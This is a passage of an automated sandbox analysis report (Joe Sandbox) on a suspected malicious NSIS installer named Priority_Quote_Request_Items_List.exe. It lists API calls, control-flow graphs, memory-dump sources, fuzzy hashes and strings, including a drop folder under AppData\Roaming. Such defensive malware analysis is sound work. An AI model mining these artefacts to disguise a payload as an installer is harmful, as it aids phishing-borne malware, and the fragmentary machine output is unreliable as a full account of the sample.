                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                      • OpenClipboard.USER32(00000000), ref: 004055DA
                                                      • EmptyClipboard.USER32 ref: 004055E0
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                      • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                      • CloseClipboard.USER32 ref: 0040563B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {$&B
                                                      • API String ID: 590372296-2518801558
                                                      • Opcode ID: 94e7a9c8279e8d63af0c1db9083f404598cd4194fda93912dfa5bf94b06c0d56
                                                      • Instruction ID: 524c7e0856e054b6ca4006a946b5ee98248767cb0fd57b02f6ab58b6cc7b5d2d
                                                      • Opcode Fuzzy Hash: 94e7a9c8279e8d63af0c1db9083f404598cd4194fda93912dfa5bf94b06c0d56
                                                      • Instruction Fuzzy Hash: A6B13B71900208FFDB219F60DD89AAE7B79FB44355F00803AFA01B61A0C7755E92DF69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 696 4066e2-4066e7 697 406758-406776 696->697 698 4066e9-406718 696->698 701 406d4e-406d63 697->701 699 40671a-40671d 698->699 700 40671f-406723 698->700 702 40672f-406732 699->702 703 406725-406729 700->703 704 40672b 700->704 705 406d65-406d7b 701->705 706 406d7d-406d93 701->706 708 406750-406753 702->708 709 406734-40673d 702->709 703->702 704->702 707 406d96-406d9d 705->707 706->707 710 406dc4-406dd0 707->710 711 406d9f-406da3 707->711 714 406925-406943 708->714 712 406742-40674e 709->712 713 40673f 709->713 724 406566-40656f 710->724 715 406f52-406f5c 711->715 716 406da9-406dc1 711->716 720 4067b8-4067e6 712->720 713->712 718 406945-406959 714->718 719 40695b-40696d 714->719 721 406f68-406f7b 715->721 716->710 725 406970-40697a 718->725 719->725 722 406802-40681c 720->722 723 4067e8-406800 720->723 729 406f80-406f84 721->729 728 40681f-406829 722->728 723->728 726 406575 724->726 727 406f7d 724->727 730 40697c 725->730 731 40691d-406923 725->731 732 406621-406625 726->732 733 406691-406695 726->733 734 40657c-406580 726->734 735 4066bc-4066dd 726->735 727->729 737 4067a0-4067a6 728->737 738 40682f 728->738 739 4068f8-4068fc 730->739 740 406a8d-406a9a 730->740 731->714 736 4068c1-4068cb 731->736 741 406ed1-406edb 732->741 742 40662b-406644 732->742 750 406ee0-406eea 733->750 751 40669b-4066af 733->751 734->721 749 406586-406593 734->749 735->701 743 406f10-406f1a 736->743 744 4068d1-4068f3 736->744 745 406859-40685f 737->745 746 4067ac-4067b2 737->746 753 406785-40679d 738->753 754 406eec-406ef6 738->754 747 406902-40691a 739->747 748 406f04-406f0e 739->748 740->724 741->721 755 406647-40664b 742->755 743->721 744->740 756 4068bd 745->756 759 406861-40687f 745->759 746->720 746->756 747->731 748->721 749->727 757 406599-4065df 749->757 750->721 758 4066b2-4066ba 751->758 753->737 754->721 755->732 760 40664d-406653 755->760 756->736 761 4065e1-4065e5 757->761 762 406607-406609 757->762 758->733 758->735 763 406881-406895 759->763 764 406897-4068a9 759->764 765 406655-40665c 760->765 766 40667d-40668f 760->766 767 4065f0-4065fe GlobalAlloc 761->767 768 4065e7-4065ea GlobalFree 761->768 769 406617-40661f 762->769 770 40660b-406615 762->770 771 4068ac-4068b6 763->771 764->771 772 406667-406677 GlobalAlloc 765->772 773 40665e-406661 GlobalFree 765->773 766->758 767->727 774 406604 767->774 768->767 769->755 770->769 770->770 771->745 775 4068b8 771->775 772->727 772->766 773->772 774->762 777 406ef8-406f02 775->777 778 40683e-406856 775->778 777->721 778->745
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                      • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                      • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                      • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405B1F,00424EF0,00424EF0,00000000,00424EF0,00424EF0, 4Wu,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                      • FindClose.KERNEL32(00000000), ref: 00406374
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: 8WB
                                                      • API String ID: 2295610775-3088156181
                                                      • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                      • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                      • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                      • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 184 403c06-403c18 185 403d59-403d68 184->185 186 403c1e-403c24 184->186 188 403db7-403dcc 185->188 189 403d6a-403db2 GetDlgItem * 2 call 4040de SetClassLongW call 40140b 185->189 186->185 187 403c2a-403c33 186->187 190 403c35-403c42 SetWindowPos 187->190 191 403c48-403c4b 187->191 193 403e0c-403e11 call 40412a 188->193 194 403dce-403dd1 188->194 189->188 190->191 196 403c65-403c6b 191->196 197 403c4d-403c5f ShowWindow 191->197 202 403e16-403e31 193->202 199 403dd3-403dde call 401389 194->199 200 403e04-403e06 194->200 203 403c87-403c8a 196->203 204 403c6d-403c82 DestroyWindow 196->204 197->196 199->200 221 403de0-403dff SendMessageW 199->221 200->193 201 4040ab 200->201 209 4040ad-4040b4 201->209 207 403e33-403e35 call 40140b 202->207 208 403e3a-403e40 202->208 212 403c8c-403c98 SetWindowLongW 203->212 213 403c9d-403ca3 203->213 210 404088-40408e 204->210 207->208 217 403e46-403e51 208->217 218 404069-404082 DestroyWindow EndDialog 208->218 210->201 215 404090-404096 210->215 212->209 219 403d46-403d54 call 404145 213->219 220 403ca9-403cba GetDlgItem 213->220 215->201 223 404098-4040a1 ShowWindow 215->223 217->218 224 403e57-403ea4 call 40603c call 4040de * 3 GetDlgItem 217->224 218->210 219->209 225 403cd9-403cdc 220->225 226 403cbc-403cd3 SendMessageW IsWindowEnabled 220->226 221->209 223->201 254 403ea6-403eab 224->254 255 403eae-403eea ShowWindow KiUserCallbackDispatcher call 404100 EnableWindow 224->255 229 403ce1-403ce4 225->229 230 403cde-403cdf 225->230 226->201 226->225 232 403cf2-403cf7 229->232 233 403ce6-403cec 229->233 231 403d0f-403d14 call 4040b7 230->231 231->219 235 403d2d-403d40 SendMessageW 232->235 237 403cf9-403cff 232->237 233->235 236 403cee-403cf0 233->236 235->219 236->231 240 403d01-403d07 call 40140b 237->240 241 403d16-403d1f call 40140b 237->241 250 403d0d 240->250 241->219 251 403d21-403d2b 241->251 250->231 251->250 254->255 258 403eec-403eed 255->258 259 403eef 255->259 260 403ef1-403f1f GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f21-403f32 SendMessageW 260->261 262 403f34 260->262 263 403f3a-403f78 call 404113 call 40601a lstrlenW call 40603c SetWindowTextW call 401389 261->263 262->263 263->202 272 403f7e-403f80 263->272 272->202 273 403f86-403f8a 272->273 274 403fa9-403fbd DestroyWindow 273->274 275 403f8c-403f92 273->275 274->210 277 403fc3-403ff0 CreateDialogParamW 274->277 275->201 276 403f98-403f9e 275->276 276->202 278 403fa4 276->278 277->210 279 403ff6-40404d call 4040de GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->201 279->201 284 40404f-404062 ShowWindow call 40412a 279->284 286 404067 284->286 286->210
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                      • ShowWindow.USER32(?), ref: 00403C5F
                                                      • DestroyWindow.USER32 ref: 00403C73
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                      • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                      • GetDlgItem.USER32(?,00000001), ref: 00403D79
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DEE
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                      • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                                      • EnableWindow.USER32(?,?), ref: 00403EE2
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EF8
                                                      • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F17
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                      • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: &B
                                                      • API String ID: 3282139019-3208460036
                                                      • Opcode ID: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                      • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                                      • Opcode Fuzzy Hash: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                      • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 287 403863-40387b call 4063f4 290 40387d-40388d call 405f61 287->290 291 40388f-4038c6 call 405ee7 287->291 300 4038e9-403912 call 403b39 call 405ad6 290->300 296 4038c8-4038d9 call 405ee7 291->296 297 4038de-4038e4 lstrcatW 291->297 296->297 297->300 305 4039a4-4039ac call 405ad6 300->305 306 403918-40391d 300->306 312 4039ba-4039df LoadImageW 305->312 313 4039ae-4039b5 call 40603c 305->313 306->305 308 403923-40394b call 405ee7 306->308 308->305 314 40394d-403951 308->314 316 403a60-403a68 call 40140b 312->316 317 4039e1-403a11 RegisterClassW 312->317 313->312 318 403963-40396f lstrlenW 314->318 319 403953-403960 call 4059fb 314->319 330 403a72-403a7d call 403b39 316->330 331 403a6a-403a6d 316->331 320 403a17-403a5b SystemParametersInfoW CreateWindowExW 317->320 321 403b2f 317->321 325 403971-40397f lstrcmpiW 318->325 326 403997-40399f call 4059ce call 40601a 318->326 319->318 320->316 324 403b31-403b38 321->324 325->326 329 403981-40398b GetFileAttributesW 325->329 326->305 333 403991-403992 call 405a1a 329->333 334 40398d-40398f 329->334 340 403a83-403a9d ShowWindow call 406384 330->340 341 403b06-403b07 call 40524c 330->341 331->324 333->326 334->326 334->333 346 403aa9-403abb GetClassInfoW 340->346 347 403a9f-403aa4 call 406384 340->347 345 403b0c-403b0e 341->345 348 403b10-403b16 345->348 349 403b28-403b2a call 40140b 345->349 352 403ad3-403af6 DialogBoxParamW call 40140b 346->352 353 403abd-403acd GetClassInfoW RegisterClassW 346->353 347->346 348->331 354 403b1c-403b23 call 40140b 348->354 349->321 358 403afb-403b04 call 4037b3 352->358 353->352 354->331 358->324
                                                      APIs
                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                      • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00000000), ref: 004038E4
                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\thrombopenia,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75573420), ref: 00403964
                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\thrombopenia,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403982
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\thrombopenia), ref: 004039CB
                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                      • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                      • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                      • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\thrombopenia$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                      • API String ID: 1975747703-776193441
                                                      • Opcode ID: 4ab84f4992c1089612af3063813e9a7832d91dbd10b28a047dcb676307e9da9d
                                                      • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                                      • Opcode Fuzzy Hash: 4ab84f4992c1089612af3063813e9a7832d91dbd10b28a047dcb676307e9da9d
                                                      • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405bef 364 402e48-402e76 call 40601a call 405a1a call 40601a GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 367 403020-403024 365->367 380 402f73-402f76 373->380 381 402fc6-402fcb 373->381 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 40320c 376->379 378->379 387 402eab-402eb2 379->387 388 402fcd-402fd5 call 402d8a 379->388 383 402f78-402f90 call 403222 call 40320c 380->383 384 402f9a-402fc4 GlobalAlloc call 403222 call 403027 380->384 381->367 383->381 410 402f92-402f98 383->410 384->381 408 402fd7-402fe8 384->408 392 402eb4-402ec8 call 405baa 387->392 393 402f2e-402f32 387->393 388->381 399 402f3c-402f42 392->399 407 402eca-402ed1 392->407 398 402f34-402f3b call 402d8a 393->398 393->399 398->399 404 402f51-402f5b 399->404 405 402f44-402f4e call 4064a5 399->405 404->376 409 402f61 404->409 405->404 407->399 414 402ed3-402eda 407->414 415 402ff0-402ff5 408->415 416 402fea 408->416 409->373 410->381 410->384 414->399 417 402edc-402ee3 414->417 418 402ff6-402ffc 415->418 416->415 417->399 419 402ee5-402eec 417->419 418->418 420 402ffe-403019 SetFilePointer call 405baa 418->420 419->399 421 402eee-402f0e 419->421 424 40301e 420->424 421->381 423 402f14-402f18 421->423 425 402f20-402f28 423->425 426 402f1a-402f1e 423->426 424->367 425->399 427 402f2a-402f2c 425->427 426->409 426->425 427->399
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00402E1B
                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405BF3
                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405C15
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00402E67
                                                      Strings
                                                      • Inst, xrefs: 00402ED3
                                                      • Null, xrefs: 00402EE5
                                                      • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                      • soft, xrefs: 00402EDC
                                                      • Error launching installer, xrefs: 00402E3E
                                                      • "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe", xrefs: 00402DEE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 4283519449-1157514023
                                                      • Opcode ID: 53a79ab10754b30072a285aae5e63ccf25b493d98f7d181817180c82abba2fcf
                                                      • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                                      • Opcode Fuzzy Hash: 53a79ab10754b30072a285aae5e63ccf25b493d98f7d181817180c82abba2fcf
                                                      • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 428 40603c-406047 429 406049-406058 428->429 430 40605a-406070 428->430 429->430 431 406076-406083 430->431 432 406288-40628e 430->432 431->432 435 406089-406090 431->435 433 406294-40629f 432->433 434 406095-4060a2 432->434 437 4062a1-4062a5 call 40601a 433->437 438 4062aa-4062ab 433->438 434->433 436 4060a8-4060b4 434->436 435->432 439 406275 436->439 440 4060ba-4060f6 436->440 437->438 442 406283-406286 439->442 443 406277-406281 439->443 444 406216-40621a 440->444 445 4060fc-406107 GetVersion 440->445 442->432 443->432 448 40621c-406220 444->448 449 40624f-406253 444->449 446 406121 445->446 447 406109-40610d 445->447 453 406128-40612f 446->453 447->446 450 40610f-406113 447->450 451 406230-40623d call 40601a 448->451 452 406222-40622e call 405f61 448->452 454 406262-406273 lstrlenW 449->454 455 406255-40625d call 40603c 449->455 450->446 457 406115-406119 450->457 466 406242-40624b 451->466 452->466 459 406131-406133 453->459 460 406134-406136 453->460 454->432 455->454 457->446 462 40611b-40611f 457->462 459->460 464 406172-406175 460->464 465 406138-40615e call 405ee7 460->465 462->453 467 406185-406188 464->467 468 406177-406183 GetSystemDirectoryW 464->468 476 4061fd-406201 465->476 479 406164-40616d call 40603c 465->479 466->454 470 40624d 466->470 472 4061f3-4061f5 467->472 473 40618a-406198 GetWindowsDirectoryW 467->473 471 4061f7-4061fb 468->471 475 40620e-406214 call 4062ae 470->475 471->475 471->476 472->471 478 40619a-4061a4 472->478 473->472 475->454 476->475 481 406203-406209 lstrcatW 476->481 483 4061a6-4061a9 478->483 484 4061be-4061d4 SHGetSpecialFolderLocation 478->484 479->471 481->475 483->484 486 4061ab-4061b2 483->486 487 4061d6-4061ed SHGetPathFromIDListW CoTaskMemFree 484->487 488 4061ef 484->488 489 4061ba-4061bc 486->489 487->471 487->488 488->472 489->471 489->484
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,Completed,?,004051B0,Completed,00000000,00000000,0040FEA0), ref: 004060FF
                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040617D
